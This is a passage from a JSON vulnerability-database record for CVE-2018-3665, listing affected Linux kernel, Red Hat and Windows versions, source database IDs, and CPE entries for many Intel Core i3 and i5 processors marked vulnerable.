        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.8"
      },
      {
        "model": "kernel 4.11-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel 4.16-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel 4.10-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.14"
      },
      {
        "model": "kernel 4.12-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux for power",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "97"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.4"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.68"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "model": "kernel 4.15-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.8"
      },
      {
        "model": "kernel 4.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.5"
      },
      {
        "model": "kernel 4.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.7"
      },
      {
        "model": "enterprise linux for arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "647"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.8"
      },
      {
        "model": "kernel 4.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux for ibm system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.4"
      },
      {
        "model": "kernel 4.11-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "kernel 4.14-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.16-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
